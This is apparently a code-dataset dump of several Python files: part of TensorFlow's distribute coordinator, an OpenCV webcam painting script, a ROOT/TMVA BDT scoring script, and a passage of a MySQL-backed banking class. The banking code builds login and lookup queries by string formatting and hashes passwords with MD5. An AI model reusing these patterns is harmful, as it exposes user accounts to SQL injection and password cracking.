session_config, rpc_layer):\n \"\"\"Runs a standalone client for between-graph replication.\"\"\"\n coord = coordinator.Coordinator()\n eval_thread = None\n if _TaskType.EVALUATOR in cluster_spec.jobs:\n eval_thread = threading.Thread(\n target=_run_single_worker,\n args=(eval_fn, eval_strategy, cluster_spec, _TaskType.EVALUATOR, 0,\n session_config),\n kwargs={\n \"rpc_layer\": rpc_layer,\n \"coord\": coord,\n })\n eval_thread.start()\n\n threads = []\n worker_barrier = _Barrier(_get_num_workers(cluster_spec))\n for task_type in [_TaskType.CHIEF, _TaskType.WORKER]:\n for task_id in range(len(cluster_spec.as_dict().get(task_type, []))):\n t = threading.Thread(\n target=_run_single_worker,\n args=(worker_fn, strategy, cluster_spec, task_type, task_id,\n session_config),\n kwargs={\n \"rpc_layer\": rpc_layer,\n \"worker_barrier\": worker_barrier,\n \"coord\": coord,\n })\n t.start()\n threads.append(t)\n\n if eval_thread:\n # TODO(yuefengz): is it necessary to join eval thread?\n threads_to_join = threads + [eval_thread]\n else:\n threads_to_join = threads\n coord.join(threads_to_join)\n\n # TODO(yuefengz): we probably want to return results from all workers?\n return None\n\n\ndef _run_in_graph_client(worker_fn, strategy, eval_fn, eval_strategy,\n cluster_spec, session_config, rpc_layer):\n \"\"\"Runs a standalone client for in-graph replication.\"\"\"\n coord = coordinator.Coordinator()\n eval_thread = None\n if _TaskType.EVALUATOR in cluster_spec.jobs:\n eval_thread = threading.Thread(\n target=_run_single_worker,\n args=(eval_fn, eval_strategy, cluster_spec, _TaskType.EVALUATOR, 0,\n session_config),\n kwargs={\n \"rpc_layer\": rpc_layer,\n \"coord\": coord,\n })\n eval_thread.start()\n\n worker_result = _run_single_worker(\n worker_fn,\n strategy,\n cluster_spec,\n None,\n None,\n session_config,\n rpc_layer=rpc_layer,\n coord=coord)\n\n if eval_thread:\n coord.join([eval_thread])\n\n return worker_result\n\n\ndef _configure_session_config_for_std_servers(\n strategy, eval_strategy, session_config, cluster_spec, task_type, task_id):\n # pylint: disable=g-doc-args\n \"\"\"Call strategy's `configure` to mutate the session_config.\n\n The session_config is currently needed as default config for a TensorFlow\n server. In the future, we should be able to remove this method and only pass\n the session config to a client session.\n \"\"\"\n if task_type == _TaskType.EVALUATOR:\n if eval_strategy:\n eval_strategy.configure(session_config=session_config)\n else:\n # The strategy may be shared in standalone client mode.\n strategy = copy.deepcopy(strategy)\n strategy.configure(\n session_config=session_config,\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id)\n # Remove the device filters specific to the strategy, so that the\n # TensorFlow server brought up with one strategy can be used by other\n # strategies. The device filters can be set in the client side as well.\n del session_config.device_filters[:]\n\n\ndef run_standard_tensorflow_server(session_config=None):\n \"\"\"Starts a standard TensorFlow server.\n\n This method parses configurations from \"TF_CONFIG\" environment variable and\n starts a TensorFlow server. The \"TF_CONFIG\" is typically a json string and\n must have information of the cluster and the role of the server in the\n cluster. 
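# --- Hedged sketch (hosts are placeholders): this is how a TF_CONFIG like
# the one documented here is typically set and then parsed back, mirroring
# the json.loads(os.environ.get("TF_CONFIG", "{}")) call in this module.
import json
import os

os.environ["TF_CONFIG"] = json.dumps({
    "cluster": {"worker": ["host1:2222", "host2:2222"],
                "ps": ["host3:2222"]},
    "task": {"type": "worker", "index": 1},
})
tf_config = json.loads(os.environ.get("TF_CONFIG", "{}"))
task_type = tf_config["task"]["type"]             # -> "worker"
task_id = int(tf_config["task"].get("index", 0))  # -> 1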
One example is:\n\n TF_CONFIG='{\n \"cluster\": {\n \"worker\": [\"host1:2222\", \"host2:2222\", \"host3:2222\"],\n \"ps\": [\"host4:2222\", \"host5:2222\"]\n },\n \"task\": {\"type\": \"worker\", \"index\": 1}\n }'\n\n This \"TF_CONFIG\" specifies there are 3 workers and 2 ps tasks in the cluster\n and the current role is worker 1.\n\n Valid task types are \"chief\", \"worker\", \"ps\" and \"evaluator\" and you can have\n at most one \"chief\" and at most one \"evaluator\".\n\n An optional key-value can be specified is \"rpc_layer\". The default value is\n \"grpc\".\n\n Args:\n session_config: an optional `tf.compat.v1.ConfigProto` object. Users can\n pass in the session config object to configure server-local devices.\n\n Returns:\n a `tf.distribute.Server` object which has already been started.\n\n Raises:\n ValueError: if the \"TF_CONFIG\" environment is not complete.\n \"\"\"\n tf_config = json.loads(os.environ.get(\"TF_CONFIG\", \"{}\"))\n if \"cluster\" not in tf_config:\n raise ValueError(\"\\\"cluster\\\" is not found in TF_CONFIG.\")\n cluster_spec = multi_worker_util.normalize_cluster_spec(tf_config[\"cluster\"])\n if \"task\" not in tf_config:\n raise ValueError(\"\\\"task\\\" is not found in TF_CONFIG.\")\n task_env = tf_config[\"task\"]\n if \"type\" not in task_env:\n raise ValueError(\n \"\\\"task_type\\\" is not found in the `task` part of TF_CONFIG.\")\n task_type = task_env[\"type\"]\n task_id = int(task_env.get(\"index\", 0))\n\n rpc_layer = tf_config.get(\"rpc_layer\", \"grpc\")\n\n session_config = session_config or config_pb2.ConfigProto()\n # Set the collective group leader for collective ops to initialize collective\n # ops when server starts.\n if \"chief\" in cluster_spec.jobs:\n session_config.experimental.collective_group_leader = (\n \"/job:chief/replica:0/task:0\")\n else:\n if \"worker\" not in cluster_spec.jobs:\n raise ValueError(\n \"You must have `chief` or `worker` jobs in the `cluster_spec`.\")\n session_config.experimental.collective_group_leader = (\n \"/job:worker/replica:0/task:0\")\n\n server = _run_std_server(\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id,\n session_config=session_config,\n rpc_layer=rpc_layer)\n server.start()\n return server\n\n\n# TODO(yuefengz): propagate cluster_spec in the STANDALONE_CLIENT mode.\n# TODO(yuefengz): we may need a smart way to figure out whether the current task\n# is the special task when we support cluster_spec propagation.\ndef run_distribute_coordinator(worker_fn,\n strategy,\n eval_fn=None,\n eval_strategy=None,\n mode=CoordinatorMode.STANDALONE_CLIENT,\n cluster_spec=None,\n task_type=None,\n task_id=None,\n session_config=None,\n rpc_layer=\"grpc\"):\n \"\"\"Runs the coordinator for distributed TensorFlow.\n\n This function runs a split coordinator for distributed TensorFlow in its\n default mode, i.e the STANDALONE_CLIENT mode. Given a `cluster_spec`\n specifying server addresses and their roles in a cluster, this coordinator\n will figure out how to set them up, give the underlying function the right\n targets for master sessions via a scope object and coordinate their training.\n The cluster consisting of standard servers needs to be brought up either with\n the standard server binary or with a binary running distribute coordinator\n with `task_type` set to non-client type which will then turn into standard\n servers.\n\n In addition to be the distribute coordinator, this is also the source of\n configurations for each job in the distributed training. 
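# --- Hedged sketch (standard library only; the cluster dict and worker body
# are illustrative): _run_between_graph_client() above fans out one thread
# per (task_type, task_id) pair and joins them all, which reduces to this
# fan-out/join shape.
import threading

cluster = {"chief": ["host0:2222"], "worker": ["host1:2222", "host2:2222"]}
results = {}

def fake_worker(task_type, task_id):
    results[(task_type, task_id)] = "done"

threads = []
for task_type in ("chief", "worker"):
    for task_id in range(len(cluster.get(task_type, []))):
        t = threading.Thread(target=fake_worker, args=(task_type, task_id))
        t.start()
        threads.append(t)
for t in threads:
    t.join()
assert len(results) == 3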
As there are multiple\n ways to configure a distributed TensorFlow cluster, its context object\n provides these configurations so that users or higher-level APIs don't have to\n figure out the configuration for each job by themselves.\n\n In the between-graph replicated training, this coordinator will create\n multiple threads and each calls the `worker_fn` which is supposed to create\n its own graph and connect to one worker master given by its context object. In\n the in-graph replicated training, it has only one thread calling this\n `worker_fn`.\n\n Another mode is the INDEPENDENT_WORKER mode where each server runs a\n distribute coordinator which will start a standard server and optionally runs\n `worker_fn` depending whether it is between-graph training or in-graph\n replicated training.\n\n The `strategy` object is expected to be a DistributionStrategy object which\n has implemented methods needed by distributed coordinator such as\n `configure(session_config, cluster_spec, task_type, task_id)` which configures\n the strategy object for a specific task and `experimental_should_init`\n property which instructs the distribute coordinator whether to run init ops\n for a task. The distribute coordinator will make a copy of the `strategy`\n object, call its `configure` method and pass it to `worker_fn` as an argument.\n\n The `worker_fn` defines the training logic and is called under its own\n worker context which can be accessed to via `get_current_worker_context`. A\n worker context provides access to configurations for each task, e.g. the\n task_type, task_id, master target and so on. Since `worker_fn` will be called\n in a thread and possibly multiple times, caller should be careful when it\n accesses global data. For example, it is unsafe to define flags in a\n `worker_fn` or to define different environment variables for different\n `worker_fn`s.\n\n The `worker_fn` for the between-graph replication is defined as if there is\n only one worker corresponding to the `worker_fn` and possibly ps jobs. For\n example, when training with parameter servers, it assigns variables to\n parameter servers and all other operations to that worker. In the in-graph\n replication case, the `worker_fn` has to define operations for all worker\n jobs. Using a distribution strategy can simplify the `worker_fn` by not having\n to worry about the replication and device assignment of variables and\n operations.\n\n This method is intended to be invoked by high-level APIs so that users don't\n have to explicitly call it to run this coordinator. For those who don't use\n high-level APIs, to change a program to use this coordinator, wrap everything\n in a the program after global data definitions such as commandline flag\n definition into the `worker_fn` and get task-specific configurations from\n the worker context.\n\n The `cluster_spec` can be either passed by the argument or parsed from the\n \"TF_CONFIG\" environment variable. Example of a TF_CONFIG:\n ```\n cluster = {'chief': ['host0:2222'],\n 'ps': ['host1:2222', 'host2:2222'],\n 'worker': ['host3:2222', 'host4:2222', 'host5:2222']}\n os.environ['TF_CONFIG'] = json.dumps({'cluster': cluster})\n ```\n\n If `cluster_spec` is not given in any format, it becomes local training and\n this coordinator will connect to a local session.\n\n For evaluation, if \"evaluator\" exists in the cluster_spec, a separate thread\n will be created to call `eval_fn` with its `task_type` set to \"evaluator\". If\n `eval_fn` is not defined, fall back to `worker_fn`. 
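# --- Hedged sketch of the evaluator split performed by
# _split_cluster_for_evaluator() above, on a plain dict (hosts illustrative):
# the evaluator keeps only its own job; every other task drops the evaluator.
cluster = {"worker": ["host1:2222"], "evaluator": ["host2:2222"]}

def split_for(task_type, spec):
    if task_type == "evaluator":
        return {"evaluator": spec["evaluator"]}
    pruned = dict(spec)
    pruned.pop("evaluator", None)
    return pruned

assert split_for("evaluator", cluster) == {"evaluator": ["host2:2222"]}
assert split_for("worker", cluster) == {"worker": ["host1:2222"]}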
This implies that\n evaluation will be done on a single machine if there is an \"evaluator\" task.\n If \"evaluator\" doesn't exist in the cluster_spec, it entirely depends on the\n `worker_fn` for how to do evaluation.\n\n Args:\n worker_fn: the function to be called. The function should accept a\n `strategy` object and will be given access to a context object via a\n context manager scope.\n strategy: a DistributionStrategy object specifying whether it should\n run between-graph replicated training or not, whether to run init ops,\n etc. This object will also be configured given `session_config`,\n `cluster_spec`, `task_type` and `task_id`.\n eval_fn: optional function for \"evaluator\" task. If `eval_fn` is not passed\n in but a \"evaluator\" task is found in the `cluster_spec`, the `worker_fn`\n will be used for this task.\n eval_strategy: optional DistributionStrategy object for \"evaluator\" task.\n mode: in which mode this distribute coordinator runs.\n cluster_spec: a dict, ClusterDef or ClusterSpec specifying servers and roles\n in a cluster. If not set or empty, fall back to local training.\n task_type: the current task type, optional if this is a client.\n task_id: the current task id, optional if this is a client.\n session_config: an optional `tf.compat.v1.ConfigProto` object which will be\n passed to `strategy`'s `configure` method and used to create a session.\n rpc_layer: optional string, the protocol for RPC, e.g. \"grpc\".\n\n Raises:\n ValueError: if `cluster_spec` is supplied but not a dict or a ClusterDef or\n a ClusterSpec.\n\n Returns:\n In the client job, return the value returned by `worker_fn` if\n it is in-graph replication or INDEPENDENT_WORKER mode; return None\n otherwise.\n \"\"\"\n tf_config = json.loads(os.environ.get(\"TF_CONFIG\", \"{}\"))\n rpc_layer = tf_config.get(\"rpc_layer\", rpc_layer)\n environment = tf_config.get(\"environment\", None)\n\n if not cluster_spec:\n cluster_spec = tf_config.get(\"cluster\", {})\n task_env = tf_config.get(\"task\", {})\n if task_env:\n task_type = task_env.get(\"type\", task_type)\n task_id = int(task_env.get(\"index\", task_id))\n\n if cluster_spec:\n # TODO(yuefengz): validate cluster_spec.\n cluster_spec = multi_worker_util.normalize_cluster_spec(cluster_spec)\n elif hasattr(strategy.extended, \"_cluster_resolver\"):\n cluster_resolver = strategy.extended._cluster_resolver # pylint: disable=protected-access\n task_type = cluster_resolver.task_type\n task_id = cluster_resolver.task_id\n rpc_layer = cluster_resolver.rpc_layer or rpc_layer\n environment = cluster_resolver.environment\n cluster_spec = cluster_resolver.cluster_spec()\n\n # Setting the session config is necessary for some strategies such as\n # CollectiveAllReduceStrategy.\n session_config = session_config or config_pb2.ConfigProto(\n allow_soft_placement=True)\n\n if cluster_spec:\n logging.info(\n \"Running Distribute Coordinator with mode = %r, cluster_spec = %r, \"\n \"task_type = %r, task_id = %r, environment = %r, rpc_layer = %r\", mode,\n cluster_spec.as_dict(), task_type, task_id, environment, rpc_layer)\n\n if not cluster_spec:\n # `mode` is ignored in the local case.\n logging.info(\"Running local Distribute Coordinator.\")\n _run_single_worker(worker_fn, strategy, None, None, None, session_config,\n rpc_layer)\n if eval_fn:\n _run_single_worker(eval_fn, eval_strategy, None, None, None,\n session_config, rpc_layer)\n else:\n logging.warning(\"Skipped evaluation since `eval_fn` is not passed in.\")\n elif mode == 
CoordinatorMode.STANDALONE_CLIENT:\n if not eval_fn:\n logging.warning(\"`eval_fn` is not passed in. The `worker_fn` will be \"\n \"used if an \\\"evaluator\\\" task exists in the cluster.\")\n eval_fn = eval_fn or worker_fn\n if not eval_strategy:\n logging.warning(\"`eval_strategy` is not passed in. No distribution \"\n \"strategy will be used for evaluation.\")\n\n # The client must know the cluster but servers in the cluster don't have to\n # know the client.\n if task_type in [_TaskType.CLIENT, None]:\n if strategy.extended.experimental_between_graph:\n return _run_between_graph_client(worker_fn, strategy, eval_fn,\n eval_strategy, cluster_spec,\n session_config, rpc_layer)\n else:\n return _run_in_graph_client(worker_fn, strategy, eval_fn, eval_strategy,\n cluster_spec, session_config, rpc_layer)\n else:\n # If not a client job, run the standard server.\n _configure_session_config_for_std_servers(strategy, eval_strategy,\n session_config, cluster_spec,\n task_type, task_id)\n server = _run_std_server(\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id,\n session_config=session_config,\n rpc_layer=rpc_layer,\n environment=environment)\n server.join()\n else:\n if mode != CoordinatorMode.INDEPENDENT_WORKER:\n raise ValueError(\"Unexpected coordinator mode: %r\" % mode)\n\n if not eval_fn:\n logging.warning(\"`eval_fn` is not passed in. The `worker_fn` will be \"\n \"used if an \\\"evaluator\\\" task exists in the cluster.\")\n eval_fn = eval_fn or worker_fn\n if not eval_strategy:\n logging.warning(\"`eval_strategy` is not passed in. No distribution \"\n \"strategy will be used for evaluation.\")\n\n # Every one starts a standard server, get session config from `configure`\n # method.\n _configure_session_config_for_std_servers(strategy, eval_strategy,\n session_config, cluster_spec,\n task_type, task_id)\n\n if (task_type != _TaskType.EVALUATOR and\n not getattr(strategy.extended, \"_std_server_started\", False)):\n # Right now, with eager mode, context is configured with a std server at\n # the very beginning while with graph mode the std server is started when\n # distribute coordinator is called. 
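# --- Hedged sketch (stand-in object, not a real TensorFlow server):
# _run_std_server() above caches the started server in a thread-local and
# insists the configuration is unchanged on later calls. The caching shape
# in miniature:
import threading

_tl = threading.local()

def get_server(cluster_spec):
    cached = getattr(_tl, "server", None)
    if cached is not None:
        # Re-entry is only allowed with the exact same configuration.
        assert _tl.cluster_spec == cluster_spec
        return cached
    _tl.cluster_spec = cluster_spec
    _tl.server = object()  # stand-in for server_lib.Server(...) + start()
    return _tl.server

s1 = get_server({"worker": ["host1:2222"]})
s2 = get_server({"worker": ["host1:2222"]})
assert s1 is s2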
We should consolidate these two paths.\n server = _run_std_server(\n cluster_spec=cluster_spec,\n task_type=task_type,\n task_id=task_id,\n session_config=session_config,\n rpc_layer=rpc_layer,\n environment=environment)\n if task_type in [_TaskType.CHIEF, _TaskType.WORKER]:\n if strategy.extended.experimental_between_graph:\n # All jobs run `worker_fn` if between-graph.\n return _run_single_worker(worker_fn, strategy, cluster_spec, task_type,\n task_id, session_config, rpc_layer)\n else:\n # Only one node runs `worker_fn` if in-graph.\n context = _WorkerContext(strategy, cluster_spec, task_type, task_id)\n if context.is_chief:\n return _run_single_worker(worker_fn, strategy, cluster_spec, None,\n None, session_config, rpc_layer)\n else:\n server.join()\n elif task_type == _TaskType.EVALUATOR:\n return _run_single_worker(eval_fn, eval_strategy, cluster_spec, task_type,\n task_id, session_config, rpc_layer)\n else:\n if task_type != _TaskType.PS:\n raise ValueError(\"Unexpected task_type: %r\" % task_type)\n server.join()\n","sub_path":"tensorflow/python/distribute/distribute_coordinator.py","file_name":"distribute_coordinator.py","file_ext":"py","file_size_in_byte":34550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"165687630","text":"import cv2 as cv\nimport numpy as np\n######################################################\nframeWidth = 640\nframeHeight = 480\n######################################################\ncapture = cv.VideoCapture(1)\ncapture.set(3,frameWidth)\ncapture.set(4,frameHeight)\ncapture.set(10,150)\n\ncolors = [[0,118,226,179,255,255],\n [92,159,156,179,245,255],\n [0,36,178,88,255,255]]\nmycolorValues = [[51,153,255],[255,0,255],[0,255,0]]\n\nmyPoints = []\ndef getContours(img):\n contours,hierarchy = cv.findContours(img,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_NONE)\n x,y,w,h = 0,0,0,0\n for cnt in contours:\n area = cv.contourArea(cnt)\n if area > 500:\n # cv.drawContours(imgResult,cnt,-1,(255,0,0),3)\n perimeter = cv.arcLength(cnt,True)\n approx = cv.approxPolyDP(cnt,0.02*perimeter,True)\n x,y,w,h = cv.boundingRect(approx)\n return x+w//2,y\n\ndef findColor(img,colors,mycolorValues):\n imgHSV = cv.cvtColor(img,cv.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in colors:\n lower = np.array([color[0:3]])\n high = np.array([color[3:6]])\n mask = cv.inRange(imgHSV,lower,high)\n x,y = getContours(mask)\n cv.circle(imgResult,(x,y),10,mycolorValues[count],cv.FILLED)\n if x != 0 and y!=0:\n new_points.append([x,y,count])\n count+=1\n return new_points\n # cv.imshow(str(color[1]),mask)\n\n\ndef drawOnCanvas(myPoints,mycolorValues):\n for point in myPoints:\n cv.circle(imgResult,(point[0],point[1]),10,mycolorValues[point[2]],cv.FILLED)\n\nwhile True:\n success,img = capture.read()\n imgResult = img.copy()\n new_points = findColor(img,colors,mycolorValues)\n if len(new_points)!=0:\n for newP in new_points:\n myPoints.append(newP)\n if len(myPoints)!=0:\n drawOnCanvas(myPoints,mycolorValues)\n cv.imshow(\"Result\",imgResult)\n if cv.waitKey(1) & 0xFF == ord('q'):\n break","sub_path":"ComputerVision/virtualpaint.py","file_name":"virtualpaint.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613490836","text":"#from __future__ import print_function\n#!/usr/bin/env python\nimport os, sys\nfrom ROOT import *\nfrom array import array\nimport numpy as np\nfrom training.variables import input_variables_bdt, 
input_selected_bdt, train_files, evalScale, evalFrac\n\nTMVA.Tools.Instance()\n\n#Channel and version\nif len(sys.argv) < 7:\n print(\"Not enough arguements: Ch, JetCat, Ver, Era, Syst. var, Model\")\n sys.exit()\nch = sys.argv[1]\njetcat = sys.argv[2]\nver = sys.argv[3]\nera = sys.argv[4]\nfile_path = sys.argv[5]\nname = sys.argv[6]\n\nall_features = True\n\nnjets_cut = int(jetcat[1:2]) #Must be jXbX\nif njets_cut not in [3,4]:\n print(\"Check jet category\")\n sys.exit()\nif len(jetcat) > 3:\n nbjets_cut = int(jetcat[3:4])\n if nbjets_cut not in [2,3,4]:\n print(\"Check b jet category\")\n sys.exit()\nelse: nbjets_cut = 0\n\n#directory name\n#rootDir = 'mkNtuple/' + era + '/root_'\nrootDir = '/data1/users/minerva1993/work/'\nif era == '2017': rootDir = rootDir + 'fcnc_RunII2017/finalMVA/current_ver/root_'\nelif era == '2018': rootDir = rootDir + 'fcnc_RunII2018/finalMVA/current_ver/root_'\nconfigDir = './'\nweightDir = 'training/' + era + '/final' + '_' + ch + '_' +jetcat + '_'\nscoreDir = era + '/' + ch + '_' +jetcat + '_'\n\n# Load data\n#syst = [\"\",\"jecup\",\"jecdown\",\"jerup\",\"jerdown\"]\nsyst = [\"\",\"jecAbsoluteup\",\"jecAbsolutedown\", \"jecAbsolute\"+era+\"up\", \"jecAbsolute\"+era+\"down\",\n \"jecBBEC1up\", \"jecBBEC1down\", \"jecBBEC1\"+era+\"up\", \"jecBBEC1\"+era+\"down\",\n \"jecFlavorQCDup\", \"jecFlavorQCDdown\", \"jecRelativeBalup\", \"jecRelativeBaldown\",\n \"jecRelativeSample\"+era+\"up\", \"jecRelativeSample\"+era+\"down\",\n \"jerup\",\"jerdown\"]\nsyst2 = [\"TuneCP5up\",\"TuneCP5down\",\"hdampup\",\"hdampdown\"] #dedecative samples exist\n\n#For now, toggle by hand between selected and all vars\ninput_features = []\nif all_features: input_features.extend(input_variables_bdt(jetcat))\nelse:\n try: input_features.extend(input_selected_bdt(ch, jetcat, era))\n except: input_features.extend(input_variables_bdt(jetcat))\n#input_features.remove('STTT')\n#input_features.remove('channel')\n\nfor syst_ext in syst + syst2:\n if syst_ext != \"\" and not os.path.exists(os.path.join(configDir, scoreDir + ver + \"-\" + syst_ext)):\n try: os.makedirs(os.path.join(configDir, scoreDir + ver + \"-\" + syst_ext))\n except: pass\n elif syst_ext == \"\" and not os.path.exists(os.path.join(configDir, scoreDir + ver) ):\n try: os.makedirs(os.path.join(configDir, scoreDir + ver))\n except: pass\n\n if (\"Run201\" in name) and syst_ext != \"\": continue\n elif (syst_ext in syst2) and not (syst_ext in name): continue\n elif (syst_ext in syst) and any(tmp in name for tmp in syst2): continue\n else:\n if (syst_ext in syst2): name = name.replace(syst_ext,\"\")\n\n if os.path.exists(os.path.join(configDir, scoreDir + ver + syst_ext, 'score_finalMVA_' + name)):\n print(scoreDir + ver + \"/score_finalMVA_\" + name + (' is already exist!').rjust(50-len(name)))\n continue\n\n reader = TMVA.Reader(\"Color:!Silent\")\n if not os.path.exists(os.path.join(rootDir + syst_ext, 'finalMVA_'+name+'.root')): continue\n data = TFile(os.path.join(rootDir + syst_ext, 'finalMVA_'+name+'.root'))\n data_tree = data.Get('tree')\n\n if syst_ext != \"\": syst_ext2 = \"-\"+syst_ext\n else: syst_ext2 = syst_ext\n outfile = TFile.Open(os.path.join(configDir, scoreDir + ver + syst_ext2, 'score_finalMVA_' + name + '.root'),'RECREATE')\n outtree = TTree(\"tree\",\"tree\")\n\n branches = {}\n for branch in data_tree.GetListOfBranches():\n branchName = branch.GetName()\n if branchName in input_features:\n branches[branchName] = array('f', [-999])\n reader.AddVariable(branchName, branches[branchName])\n 
data_tree.SetBranchAddress(branchName, branches[branchName])\n\n elif branchName in [\"EventCategory\", \"njets\", \"nbjets_m\"]:\n branches[branchName] = array('f', [-999])\n reader.AddSpectator(branchName, branches[branchName])\n\n reader.BookMVA('BDT', TString(os.path.join(configDir, weightDir+ver, 'weights/TMVAClassification_BDT.weights.xml')))\n\n totalevt = data_tree.GetEntries()\n #print(\"this sample contains \"+str(totalevt)+\" combinations\")\n\n score = np.zeros(1, dtype=np.float32)\n nevt = np.zeros(1, dtype=int)\n njets = np.zeros(1, dtype=int)\n nbjets_m = np.zeros(1, dtype=int)\n EventCategory = np.zeros(1, dtype=int)\n lepPt = np.zeros(1, dtype=np.float32)\n missinget = np.zeros(1, dtype=np.float32)\n score_stfcnc = np.zeros(1, dtype=np.float32)\n score_ttfcnc = np.zeros(1, dtype=np.float32)\n score_ttbkg = np.zeros(1, dtype=np.float32)\n\n outtree.Branch('MLScore' , score , 'MLScore/F')\n outtree.Branch('nevt' , nevt , 'nevt/I')\n outtree.Branch('njets' , njets , 'njets/I')\n outtree.Branch('nbjets_m' , nbjets_m , 'nbjets_m/I')\n outtree.Branch('EventCategory', EventCategory, 'EventCategory/I')\n outtree.Branch('lepPt' , lepPt , 'lepPt/F')\n outtree.Branch('missinget' , missinget , 'missinget/F')\n outtree.Branch('score_stfcnc' , score_stfcnc , 'score_stfcnc/F')\n outtree.Branch('score_ttfcnc' , score_ttfcnc , 'score_ttfcnc/F')\n outtree.Branch('score_ttbkg' , score_ttbkg , 'score_ttbkg/F')\n\n for i in xrange(totalevt):\n data_tree.GetEntry(i)\n Nevt = data_tree.nevt\n\n if njets_cut == 3:\n if data_tree.njets != njets_cut: continue\n elif njets_cut == 4:\n if data_tree.njets < njets_cut: continue\n if nbjets_cut != 0:\n if data_tree.nbjets_m != nbjets_cut: continue\n\n score[0] = reader.EvaluateMVA('BDT')\n nevt[0] = data_tree.nevt\n njets[0] = data_tree.njets\n nbjets_m[0] = data_tree.nbjets_m\n EventCategory[0] = data_tree.EventCategory\n lepPt[0] = data_tree.lepton_pt\n missinget[0] = data_tree.MET\n\n if data_tree.njets == 3:\n score_stfcnc[0] = data_tree.stfcnc_score\n score_ttfcnc[0] = -1.0\n score_ttbkg[0] = -1.0\n else:\n score_stfcnc[0] = data_tree.stfcnc_score\n score_ttfcnc[0] = data_tree.ttfcnc_score\n score_ttbkg[0] = data_tree.ttbkg_score\n outtree.Fill()\n #print('processing '+str(Nevt)+'th event', end='\\r')\n\n score[0] = -1\n nevt[0] = 0\n njets[0] = 0\n nbjets_m[0] = 0\n EventCategory[0] = 0\n lepPt[0] = 0\n missinget[0] = 0\n score_stfcnc[0] = -1.0\n score_ttfcnc[0] = -1.0\n score_ttbkg[0] = -1.0\n outtree.Fill()\n\n outfile.Write()\n outfile.Close()\n","sub_path":"finalMVA/evaluation_bdt.py","file_name":"evaluation_bdt.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574823058","text":"import mysql.connector as mysql\nimport datetime\nfrom pessoa import Pessoa\nfrom cliente import Cliente\nfrom conta import Conta\nfrom conexaoBD import ConexaoBD\n\nclass Registros:\n\t__slots__ = ['_clientes','_contas', '_bd']\n\t\n\tdef __init__(self):\n\t\tself._clientes = []\n\t\tself._contas = []\n\t\tself._bd = ConexaoBD()\n\n\t@property\n\tdef clientes(self):\n\t\treturn self._clientes\n\n\t@property\n\tdef contas(self):\n\t\treturn self._contas\n\n\t@property\n\tdef bd(self):\n\t\treturn self._bd\n\n\t# -----------------------BUSCAS-------------------------- #\n\n\t# Função que inicializa a classe cliente;\n\tdef montaCLIENTE(self, aux):\n\t\tencontrado = None\n\t\tif( len(aux) > 0 ):\n\t\t\t# nome, sobrenome, cpf, email, telefone\n\t\t\t# 
print(aux)\n\t\t\tencontrado = Cliente(Pessoa(aux[0][1], aux[0][2], aux[0][0], aux[0][3], aux[0][4]), aux[0][5])\n\t\t\t# print(\"encontrado = {encontrado}\")\n\t\treturn encontrado\n\n\t# Função que busca um cliente pelo o CPF.\n\tdef buscaCLIENTE(self,cpf):\n\t\t#print(\"buscaCLIENTE(...)\")\n\t\tsql = (\"SELECT * FROM cliente WHERE cpf = '%s'\" %(cpf))\n\t\taux = self.bd.executaSELECT(sql)\n\t\tencontrado = self.montaCLIENTE(aux)\n\t\treturn encontrado\n\n\t# Função que inicializa a classe conta;\n\tdef montaCONTA(self,aux):\n\t\tencontrado = None\n\t\t# print(aux)\n\t\tif(len(aux) > 0 ):\n\t\t\t# nome, sobrenome, cpf, email, telefone\n\t\t\t# print(f\"montaCONTA aux[0][1] = {aux[0][1]}\")\n\t\t\tcliente = self.buscaCLIENTE(aux[0][1])\n\t\t\tencontrado = Conta(aux[0][0],cliente,aux[0][2],aux[0][3],aux[0][4])\n\t\t\t# print(f\"encontrado em conta = {encontrado}\")\n\t\treturn encontrado\n\n\t# Verifica se já possui uma conta com o número buscado...\n\tdef buscaCONTA(self,cpf):\n\t\tsql = (\"SELECT * FROM conta WHERE cpf_cliente = '%s'\"%(cpf))\n\t\taux = self.bd.executaSELECT(sql)\n\t\tencontrado = self.montaCONTA(aux)\n\t\treturn encontrado\n\n\n\n\t# Busca um conta pelo o CPF:\n\tdef buscaCONTA_num(self,num):\n\t\tsql = (\"SELECT * FROM conta WHERE numero = '%s'\"%(num))\n\t\taux = self.bd.executaSELECT(sql)\n\t\tencontrado = self.montaCONTA(aux)\n\t\treturn encontrado\n\n\t# --------------------------------------------------------------------- #\n\t# Retorna uma lista contendo:\n\t# Retorna o usuário caso seja digitado os dados corretamente, caso contrário retorna retorna None;\n\t# Junto com o usuário ou None é retornado uma mensagem.\n\tdef fazerLOGIN(self, num, senha):\n\n\t\tlogado = []\n\n\t\tif num != '' and senha != '':\n\t\t\t# todos os campos foram preenchidos\n\t\t\t\n\t\t\tconta = self.buscaCONTA_num(num) # busca o usuário na lista de funcionarios cadastrados.\n\t\t\t#print(f\"conta login = {conta}\")\n\n\t\t\tsql = (\"SELECT * FROM conta WHERE numero = '%s' AND senha = MD5('%s')\" %(num,senha))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tconta = self.montaCONTA(Aqui)\n\t\t\tif(conta != None):\n # Funcionário existe!\n\t\t\t\tmensagem = (f\"Bem vindo, {conta.titular.nome}!\")\n\t\t\t\tlogado.append(conta)\n \n\t\t\telse:\n\t\t\t\t# O funcionário não existe.\n\t\t\t\tmensagem = \"Conta não encontrada ou senha incorreta. 
